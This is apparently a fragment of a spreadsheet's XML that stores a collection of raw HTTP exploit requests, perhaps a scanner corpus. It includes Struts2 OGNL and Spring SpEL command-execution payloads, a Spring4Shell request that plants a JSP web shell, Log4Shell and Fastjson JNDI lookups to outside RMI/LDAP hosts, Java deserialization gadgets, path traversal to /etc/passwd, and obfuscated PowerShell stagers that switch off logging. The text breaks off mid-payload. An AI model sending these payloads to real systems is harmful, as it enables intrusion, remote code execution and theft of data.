    <t xml:space="preserve">GET /oauth/authorize?response_type=${2*3}&amp;client_id=acme&amp;scope=openid&amp;redirect_uri=http://test HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36
Connection: close
Accept-Encoding: identity
Authorization: Basic YWRtaW46YWRtaW4=
</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">GET /..%2f..%2f..%2f..%2f..%2fetc/passwd HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept-Encoding: identity
</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>POST /gs-guide-websocket/754/fg20hkt2/xhr_send?t=1646903360968 HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Connection: close
Content-Length: 134
Accept-Encoding: identity
["SUBSCRIBE\nselector:T(java.lang.Runtime).getRuntime().exec('touch /tmp/success')\nid:sub-0\ndestination:/topic/greetings\n\n\u0000"]</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>POST /doUpload.action HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Content-Length: 1091
Accept-Encoding: identity
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryWx1nMTn6ALWIDGXH
------WebKitFormBoundaryWx1nMTn6ALWIDGXH
Content-Disposition: form-data; name="upload"; filename="%{(#nike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whoami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java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}\x0b"
Content-Type: image/jpeg
111
------WebKitFormBoundaryWx1nMTn6ALWIDGXH
Content-Disposition: form-data; name="caption"
------WebKitFormBoundaryWx1nMTn6ALWIDGXH--</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">GET /solr/admin/cores?action=${jndi:rmi://192.168.248.133:1099/sm0syp} HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36
Connection: close
Accept-Encoding: identity
</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>POST / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36
Connection: close
Content-Length: 1677
Accept-Encoding: identity
Content-Type: application/xml
&lt;java.util.PriorityQueue serialization='custom'&gt; &lt;unserializable-parents/&gt; &lt;java.util.PriorityQueue&gt; &lt;default&gt; &lt;size&gt;2&lt;/size&gt; &lt;/default&gt; &lt;int&gt;3&lt;/int&gt; &lt;javax.naming.ldap.Rdn_-RdnEntry&gt; &lt;type&gt;12345&lt;/type&gt; &lt;value class='com.sun.org.apache.xpath.internal.objects.XString'&gt; &lt;m__obj class='string'&gt;com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content&lt;/m__obj&gt; &lt;/value&gt; &lt;/javax.naming.ldap.Rdn_-RdnEntry&gt; &lt;javax.naming.ldap.Rdn_-RdnEntry&gt; &lt;type&gt;12345&lt;/type&gt; &lt;value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'&gt; &lt;message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'&gt; &lt;parsedMessage&gt;true&lt;/parsedMessage&gt; &lt;soapVersion&gt;SOAP_11&lt;/soapVersion&gt; &lt;bodyParts/&gt; &lt;sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'&gt; &lt;attachmentsInitialized&gt;false&lt;/attachmentsInitialized&gt; &lt;nullIter class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'&gt; &lt;aliases class='com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl'&gt; &lt;candidates class='com.sun.jndi.rmi.registry.BindingEnumeration'&gt; &lt;names&gt; &lt;string&gt;aa&lt;/string&gt; &lt;string&gt;aa&lt;/string&gt; &lt;/names&gt; &lt;ctx&gt; &lt;environment/&gt; &lt;registry class='sun.rmi.registry.RegistryImpl_Stub' serialization='custom'&gt; &lt;java.rmi.server.RemoteObject&gt; &lt;string&gt;UnicastRef&lt;/string&gt; &lt;string&gt;192.168.248.132&lt;/string&gt; &lt;int&gt;4444&lt;/int&gt; &lt;long&gt;0&lt;/long&gt; &lt;int&gt;0&lt;/int&gt; &lt;long&gt;0&lt;/long&gt; &lt;short&gt;0&lt;/short&gt; &lt;boolean&gt;false&lt;/boolean&gt; &lt;/java.rmi.server.RemoteObject&gt; &lt;/registry&gt; &lt;host&gt;192.168.248.132&lt;/host&gt; &lt;port&gt;4444&lt;/port&gt; &lt;/ctx&gt; &lt;/candidates&gt; &lt;/aliases&gt; &lt;/nullIter&gt; &lt;/sm&gt; &lt;/message&gt; &lt;/value&gt; &lt;/javax.naming.ldap.Rdn_-RdnEntry&gt; &lt;/java.util.PriorityQueue&gt; &lt;/java.util.PriorityQueue&gt;</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>POST /testfj HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 135
Accept-Encoding: identity
Content-Type: application/json
{"@type": "org.apache.ibatis.datasource.jndi.JndiDataSourceFactory", "properties": {"data_source": "ldap://192.168.1.11:1389/Exploit"}}</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>POST /exploit HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36
Connection: close
Content-Length: 1298
Accept-Encoding: identity
Content-Type: application/json
{
  "param": [
    "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl",
    {
      "transletBytecodes": [
  "yv66vgAAADMAKAoABAAUCQADABUHABYHABcBAAVwYXJhbQEAEkxqYXZhL2xhbmcvT2JqZWN0OwEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQAcTGNvbS9iMW5nei9zZWMvbW9kZWwvVGFyZ2V0OwEACGdldFBhcmFtAQAUKClMamF2YS9sYW5nL09iamVjdDsBAAhzZXRQYXJhbQEAFShMamF2YS9sYW5nL09iamVjdDspVgEAClNvdXJjZUZpbGUBAAtUYXJnZXQuamF2YQwABwAIDAAFAAYBABpjb20vYjFuZ3ovc2VjL21vZGVsL1RhcmdldAEAEGphdmEvbGFuZy9PYmplY3QBAAg8Y2xpbml0PgEAEWphdmEvbGFuZy9SdW50aW1lBwAZAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwwAGwAcCgAaAB0BABV0b3VjaCAvdG1wL3Byb3ZlMS50eHQIAB8BAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7DAAhACIKABoAIwEAQGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ydW50aW1lL0Fic3RyYWN0VHJhbnNsZXQHACUKACYAFAAhAAMAJgAAAAEAAgAFAAYAAAAEAAEABwAIAAEACQAAAC8AAQABAAAABSq3ACexAAAAAgAKAAAABgABAAAABgALAAAADAABAAAABQAMAA0AAAABAA4ADwABAAkAAAAvAAEAAQAAAAUqtAACsAAAAAIACgAAAAYAAQAAAAoACwAAAAwAAQAAAAUADAANAAAAAQAQABEAAQAJAAAAPgACAAIAAAAGKiu1AAKxAAAAAgAKAAAACgACAAAADgAFAA8ACwAAABYAAgAAAAYADAANAAAAAAAGAAUABgABAAgAGAAIAAEACQAAABYAAgAAAAAACrgAHhIgtgAkV7EAAAAAAAEAEgAAAAIAEw=="
      ],
      "transletName": "a.b",
      "outputProperties": {}
    }
  ]
}</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">GET /orders/4/(%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23rs%3d@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command[0]).getInputStream()),%23wr.println(%23rs),%23wr.flush(),%23wr.close()):xx.toString.json?obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&amp;content=16456&amp;command=cat+/etc/passwd HTTP/1.1
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Accept-Encoding: identity
</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">GET /orders/4/%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23xx%3d123,%23rs%3d@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command[0]).getInputStream()),%23wr%3d%23context[%23parameters.obj[0]].getWriter(),%23wr.print(%23rs),%23wr.close(),%23xx.toString.json?obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&amp;content=2908&amp;command=cat%20/etc/passwd HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept-Encoding: identity
</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">POST /gs-guide-websocket/881/vfwndejq/websocket HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 0
Accept-Encoding: identity
Content-Type: application/x-www-form-urlencoded
Selector: T(java.lang.Runtime).getRuntime().exec('whoami')
</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">GET /?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&amp;class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&amp;class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&amp;class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&amp;class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
Connection: close
Accept-Encoding: identity
</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>POST /exploit HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 1298
Accept-Encoding: identity
Content-Type: application/json
{
  "param": [
    "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl",
    {
      "transletBytecodes": [
  "yv66vgAAADMAKAoABAAUCQADABUHABYHABcBAAVwYXJhbQEAEkxqYXZhL2xhbmcvT2JqZWN0OwEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQAcTGNvbS9iMW5nei9zZWMvbW9kZWwvVGFyZ2V0OwEACGdldFBhcmFtAQAUKClMamF2YS9sYW5nL09iamVjdDsBAAhzZXRQYXJhbQEAFShMamF2YS9sYW5nL09iamVjdDspVgEAClNvdXJjZUZpbGUBAAtUYXJnZXQuamF2YQwABwAIDAAFAAYBABpjb20vYjFuZ3ovc2VjL21vZGVsL1RhcmdldAEAEGphdmEvbGFuZy9PYmplY3QBAAg8Y2xpbml0PgEAEWphdmEvbGFuZy9SdW50aW1lBwAZAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwwAGwAcCgAaAB0BABV0b3VjaCAvdG1wL3Byb3ZlMS50eHQIAB8BAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7DAAhACIKABoAIwEAQGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ydW50aW1lL0Fic3RyYWN0VHJhbnNsZXQHACUKACYAFAAhAAMAJgAAAAEAAgAFAAYAAAAEAAEABwAIAAEACQAAAC8AAQABAAAABSq3ACexAAAAAgAKAAAABgABAAAABgALAAAADAABAAAABQAMAA0AAAABAA4ADwABAAkAAAAvAAEAAQAAAAUqtAACsAAAAAIACgAAAAYAAQAAAAoACwAAAAwAAQAAAAUADAANAAAAAQAQABEAAQAJAAAAPgACAAIAAAAGKiu1AAKxAAAAAgAKAAAACgACAAAADgAFAA8ACwAAABYAAgAAAAYADAANAAAAAAAGAAUABgABAAgAGAAIAAEACQAAABYAAgAAAAAACrgAHhIgtgAkV7EAAAAAAAEAEgAAAAIAEw=="
      ],
      "transletName": "a.b",
      "outputProperties": {}
    }
  ]
}</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">GET /static?/%2557EB-INF/web.xml HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Accept-Encoding: identity
</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">GET /robots HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36
Connection: close
Accept-Encoding: identity
</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">GET /jbossmq-httpil/HTTPServerILServlet HTTP/1.1
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Accept-Encoding: identity
</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">GET /$%7b(%23_memberAccess[%27allowStaticMethodAccess%27]=true).(%23p=new%20java.lang.ProcessBuilder(%7b%27cmd.exe%27,%27/c%27,%27powershell.exe%20-nop%20-w%20hidden%20-noni%20-ep%20bypass%20%22&amp;([scriptblock]::create((New-Object%20System.IO.StreamReader(New-Object%20System.IO.Compression.GzipStream((New-Object%20System.IO.MemoryStream(,[System.Convert]::FromBase64String(((%27H4sIAPfoH2MCA5VVXW8aORR951dcoelmRgEL2KrqRkpVOk1XkbIt6mQ3DwgpxnMJszE2a3sCKOG/157xfBASbesHGPteHx+fe2wvcsFMJgX8iaZ/g3PGMxQGOo8dsC3YMDiHr7jpf5v/i8xA/3q3xq90%7b1%7dXbQEJsfF/lVMvlb42dc0JybWGFqIxnl2kIERuVYZ02U3O7Isww73%27+%27%7b1%7dqpcjv7zq%27+%27KiuJYbVLZn2UERn1BFV2H5PU2MysTdLIjlakVF2jscTTRnUjwb/Cw3gkuaFqORx1SSodbgBVjJNOfoCH4MIy%7b1%7dTsgWE1TLQx/+gO89E2o2KYDmvmMszbVCgspOnyc5+r4%7b1%7dTLZHsHo0m12x95TNmb207nki0ocq4df3KRdSX6LyVN2YM18YCluUISyr71+gqfECl8Z%7b1%7dxDd0q+UvM44lfqDv8%27+%27Y0SG796T0dv3ZPj7qNt%27+%27zO/HLd0oJtVFIV45vCU+s1ZJizPJsGJYVKgk6t3R9QVr0tOZJBfYKQ2S5ysyOJFVq6NfvBQtr%27+%27K+yFj8G1Rd%27+%279Dn2qYHsz5jitpMEZlskXGqMF/KM9S6rwXU87nlN3PougFOmScm6Uzrps01q9qE4ic817XcD10vYJQG68WqtloW8npfGdwOpsF7t9ZckDI%27+%27aG%27+%27Db05vHwd6LjSKtwuHU4NYQFEymzu9nZ+MkvryMXAE+uZywe2ONKzcaJu5oJUvkHFQu%7b1%7dM0GK0+urXm7cAoBiocz1xPu6J/aMVupOsDkap2bJngrYrneqexuaSCMI/grY0pquTAQS7WWqlCUwNgt5pI0KLTYD5iSW3ErvC29HOTG1gbDZmO9Qa/pkCsUd2bZ9lF1qNtOOjLSr6k0PZ3BlYV0svgLgdQ8f51rNeuLVBeULS3nE%7b1%7dQyUV84TVZD27Xw4J6OSLXb8kqrkKKnS/Eg77F/sV1bbbXVu0bZty21WWYcwzDICteVm/iONA1Lj/Vg0IPggH0EfYEwOJL0wumH6bXV8rUn%27+%27w59Tl0IKjS+85g2KPW3UUWm%7b1%7d+eui2F0lKgRZ9Kya9nC6Y%7b1%7d7tG/rV1VeCjz78NoQn+JabfokK3jwHUCMoBKmAT+FkksCJ/S/0v5Ks8HBEJtQsXfQDnDQgW0ckQK%27+%27Wkmg5mB4u1WBdxwj%7b1%7dSFUYvMT%7b1%7dvd+xR23aODfxT/m1g/texbcMe+bWa84Xnelm/%7b1%27+%27%7dv7i8Xd7zKVGv5/iOFZvVNswz%27+%27cO%27+%27VGLmuXiv/a51ZP/R17dwD+wOSdLPeqwgAAA%7b0%7d%7b0%7d%27)-f%27=%27,%27h%27)))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))%22%27%7d)).(%23p.redirectErrorStream(true)).(%23process=%23p.start()).(%23r=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(%23process.getInputStream(),%23r)).(%23r.flush())%7d/showcase.action HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36
Connection: close
Accept-Encoding: identity
</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>POST /users?page&amp;size=5 HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Content-Length: 124
Accept-Encoding: identity
Content-Type: application/x-www-form-urlencoded
Pragma: no-cache
username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch+/tmp/success")]=&amp;password=&amp;repeatedPassword=</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">POST /functionRouter HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Content-Length: 0
Accept-Encoding: identity
Content-Type: application/x-www-form-urlencoded
Spring.cloud.function.routing-Expression: T(java.lang.Runtime).getRuntime().exec("touch /tmp/RCE")
</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>POST /console/css/.%252e/console.portal HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 6684
Accept-Encoding: identity
Content-Type: application/x-www-form-urlencoded
handle=com.tangosol.coherence.mvel2.sh.ShellSession%28%27java.lang.Runtime.getRuntime%28%29.exec%28new%20java.lang.String%5b%5d%20%7b%22cmd.exe%22%2c%20%22/c%22%2c%20new%20java.lang.String%28java.util.Base64.getDecoder%28%29.decode%28%22cG93ZXJzaGVsbC5leGUgLW5vcCAtdyBoaWRkZW4gLW5vbmkgLWMgImlmKFtJbnRQdHJdOjpTaXplIC1lcSA0KXskYj0kZW52OndpbmRpcisnXHN5c25hdGl2ZVxXaW5kb3dzUG93ZXJTaGVsbFx2MS4wXHBvd2Vyc2hlbGwuZXhlJ31lbHNleyRiPSdwb3dlcnNoZWxsLmV4ZSd9OyRzPU5ldy1PYmplY3QgU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3NTdGFydEluZm87JHMuRmlsZU5hbWU9JGI7JHMuQXJndW1lbnRzPSctbm9uaSAtbm9wIC13IGhpZGRlbiAtYyAgJGV6Tj1bQ29sbGVjdGlvbnMuR2VuZXJpYy5EaWN0aW9uYXJ5W3N0cmluZyxTeXN0ZW0uT2JqZWN0XV06Om5ldygpOyAkY2g9KCgnJ0VuYXsyfWxlJycrJyd7MH1jJycrJydyaXAnJysnJ3szfUJsb2MnJysnJ3snJysnJzF9TG9nZ2luZycnKS1mJydTJycsJydrJycsJydiJycsJyd0JycpOyAkcHhVUT0oKCcnU2NyaScnKycncHsxfUJ7MH1vYycnKycna0xvJycrJydnZ2l7Mn1nJycrJycnJyktZicnbCcnLCcndCcnLCcnbicnKTtJZigkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uLk1ham9yIC1nZSAzKXsgJHF5Uz1bUmVmXS5Bc3NlbWJseS5HZXRUeXBlKCgoJyd7NH17MX0nJysnJ3N0ZW0uJycrJyd7JycrJyc1JycrJyd9JycrJydhbmF7MicnKycnfWVtZW4nJysnJ3QuJycrJyd7N317MH10eycnKycnOH0nJysnJ20nJysnJ2F0ezl9eycnKycnOH1uLicnKycnezd9bXN7OScnKycnfXs2JycrJyd9JycrJyd0eycnKycnOX17JycrJyczJycrJyd9JycrJydzJycpLWYnJ3UnJywnJ3knJywnJ2cnJywnJ2wnJywnJ1MnJywnJ00nJywnJ1UnJywnJ0EnJywnJ28nJywnJ2knJykpOyAkaVJrPVtSZWZdLkFzc2VtYmx5LkdldFR5cGUoKCgnJ1N7MX1zdGVtLicnKycnezJ9YW5hezN9ZScnKycnbWVudCcnKycnLns1fXUnJysnJ3RvJycrJydtYXRpb24uezAnJysnJ310aXs0fXMnJysnJycnKS1mJydVJycsJyd5JycsJydNJycsJydnJycsJydsJycsJydBJycpKTsgJHRnPSgoJydFbicnKycnYXsyfWxlU2NyaXB0ezN9bCcnKycnbycnKycnY3swJycrJyd9JycrJyd7NX1uezF9b2NhdGlvbnsnJysnJzR9JycrJydvZ2dpbmcnJyktZicnaycnLCcndicnLCcnYicnLCcnQicnLCcnTCcnLCcnSScnKTsgJGpxMj0kaVJrLkdldEZpZWxkKCcnY2FjaGVkR3JvdXBQb2xpY3lTZXR0aW5ncycnLCcnTm9uUHVibGljLFN0YXRpYycnKTsgaWYgKCRxeVMpIHsgJHF5Uy5HZXRGaWVsZCgoKCcnJycrJydhezR9JycrJyd7MCcnKycnfWknJysnJ0knJysnJ3syfWl7JycrJyczfUZhJycrJydpezF9JycrJydlZCcnKS1mJydzJycsJydsJycsJyduJycsJyd0JycsJydtJycpLCcnTm9uUHVibGljLFN0YXRpYycnKS5TZXRWYWx1ZSgkbnVsbCwkdHJ1ZSk7IH07IElmICgkanEyKSB7ICRiMElUPSRqcTIuR2V0VmFsdWUoJG51bGwpOyBJZigkYjBJVFskcHhVUV0peyAkYjBJVFskcHhVUV1bJHRnXT0wOyAkYjBJVFskcHhVUV1bJGNoXT0wOyB9ICRlek4uQWRkKCR0ZywwKTsgJGV6Ti5BZGQoJGNoLDApOyAkYjBJVFsnJ0hLRVlfTE9DQUxfTUFDSElORVxTb2Z0d2FyZVxQb2xpY2llc1xNaWNyb3NvZnRcV2luZG93c1xQb3dlclNoZWxsXCcnKyRweFVRXT0kZXpOOyB9IEVsc2UgeyBbUmVmXS5Bc3NlbWJseS5HZXRUeXBlKCgoJycnJysnJ1MnJysnJ3swfXN0ZScnKycnbS57MScnKycnfWFuJycrJydhZ2VtZW50LnszJycrJyd9ezJ9dG9tYXRpJycrJydvbi5TY3s0fWlwdEJ7NX1vJycrJydjaycnKS1mJyd5JycsJydNJycsJyd1JycsJydBJycsJydyJycsJydsJycpKS5HZXRGaWVsZCgnJ3NpZ25hdHVyZXMnJywnJ05vblB1YmxpYyxTdGF0aWMnJykuU2V0VmFsdWUoJG51bGwsKE5ldy1PYmplY3QgQ29sbGVjdGlvbnMuR2VuZXJpYy5IYXNoU2V0W3N0cmluZ10pKTsgfX07Jihbc2NyaXB0YmxvY2tdOjpjcmVhdGUoKE5ldy1PYmplY3QgU3lzdGVtLklPLlN0cmVhbVJlYWRlcihOZXctT2JqZWN0IFN5c3RlbS5JTy5Db21wcmVzc2lvbi5HemlwU3RyZWFtKChOZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW0oLFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoKCgnJ0g0c0lBSHo2R21NQ0E3VlgrMi9pU0JMK2ZhWDlINndWRWtaRHdFNUlkakxTU0dkakc1dkI1dUZYZ0VVbll6ZDJROXNtZmdTVHZmM2ZyOXBBa3RGa2R1ZE9tcFpRM0k5NjlGZGZWVmMyWmVJWE9FMlk0MkhJL3swfW5yTDh4NVRMek1peG0yRVc0R2JhYXgxbHEnJysnJ3ZXNDF5VjZJajg1bGhsOEorTDZXeGg1ezB9VnAwLzlNc3RRVXB6bW5RRXFoRHhIOFpwZ2xMTXQ1aitNRzZFTVhZM1hXK1FYJycrJyd6SjlNNDkrZEFVblhIamtmTy9ZOXswfTBMTWxaQUVkRytVK2g3MXEyezB9dUNTN1k1aDkvTkZ2TEszN1ZrUjlMaitSczB6em1CWW83QVNITkZ2TlhpeHEwam52RU5uWHNaMm1lYm9xT2k1T2I2NDZkNU40R0dhRHRDZW1vaScnKycnTklnYjgnJysnJ0p0WHUrVG9hTE1rdk8xcUo3VEtiWUpuNU1zOVlVZ3lGQ2VOOXZNa2xwWXJsYi9ZcGRuODdNeUtYQ01PbHBTb0N6ZG15aDd3ajdLTzZxWEJBVE4wR1lGVW1hUjRTUmN0VnB3N0NuZEliYVJsSVMwbWY5RkRXJycrJyd1Z3d3VzhIeFZpM3dyQnFVbVJ0ZG9RMC9jdXFxZEJTZEJKdHswfW1PcDVRSUxSZ25NZ0IrZjFFSU54ZjI1QTlDVWJ6RG45ZUZ5MWpXT3doY1ppZHBqbXZwend6WFpuU3c3UlZwUnBuVnNMSVN0Vll2Z0RPJycrJydOT0dyL3FDNytJZ2hpai8wWnJDeWRGQWVyVi9tdnd0ODRhezB9VEk5Nmtzb1ExT2tIUk12Qmo3RjdheTd3VUViUWlxOGVoY2pobmdIdHM4YjZCQVFnU0ZYa0VScHJ6NFJreU9jZkVpSzVhWUJDZ1RmQWhxRGw1QnZGdGZPM01LR3R2VUVoM0ZnTnhwRGtSdGJDQkgwT1gwT1MrT0YrdDBEb2VhZmVMbGVadVpsSkNrZnBzeGtVZFEwR2FFSk1mbkxhRXMwdnF6K2VxdVhwSUMrMTVlWE5TdFdsK0JlVGJhVDVPOHlFb2ZJZ29BV09ZZStkZ2pGSTgybytJQScnKycnaVVjVGh4Zmp6WGZSNkh1RVFPS0FwaScnKycnZUlCcXhRRk15QzhpUUR7MH00RVRyWTZKQ2kzZUV4VERpYnBnS01RTG9UeWNrNk9tbFJlaW97MH1tdWs1Y0VPTEdkWW5JQjQ0MkxFR2lUcEVXYmNYQldRezB9R2grQUt2L2c4SHZxMDU0RWsvUStlWXNKZTBXb3JIZ3RLK2tkenRTNXV5OHd4T0RVVldBQXhLbHNhaWw2TzczcW02c0w5MVpTemRUcVQwV1lBaEs3T3BJNXEyczlEMFlFaE1yVERuTWg3WlVhUmhYZ3RoZnJSbHJqcmE0YVRnOWw5TVNSVXlxWW8yZ3BacnNpb2VwN3dvK0NyKzNSbUt0ZzF5dUQrYWJpdE5DTVE0ZkFqbi9ZTTJpUjQwTU5RZmhWb0lmMFV0OGtWdXdZVWlwNGd5NW9UUW5LcFR6SVh6SHI4d2RKOW8zWTlFeE0rbVpncXFTKzFOZlhVb2VSWFlrWHM5OWFHeUJFTWZDcEV5RGhUK1dvbW9qaDNWc2RnTlJwSmN6MzA2bjg1ekdjdGdSMWJtVXlkQ3JyTVhYVmxaVEoyOUZuNDRoRk5uMU8wcGtRanInJysnJ0dxNUdlN01MZytjQmg4SXkxN2Mzbm51N1g4Y09CeGk1cHBaRXByL3BXNm9maTkydVkvT0docEZpdVR1dU9sQjhIQU5rMGpzbmlSTUtxekRwT25kaS9WV05MYTNVclhsdnROVzRjYjlYNmMrYTRPN3c4R0FuNm1HU0EnJysnJ3lnaXZiZGxYNmVTemNWM1RpL2VWQlFxUWVyeWFPdlNyeEYvL3poVFo0TTVMNW97MH12REVaRC9RYi9TRjgxdU5LblhKS0wxQUNSUjhZNW13cjN2cURSVHh6akNKd0FFOGxlbHhMOHZ7MH1ZMXA5MVorRjZxbjA5ZHNqWWNFaXlIbFRtZW1lVWhy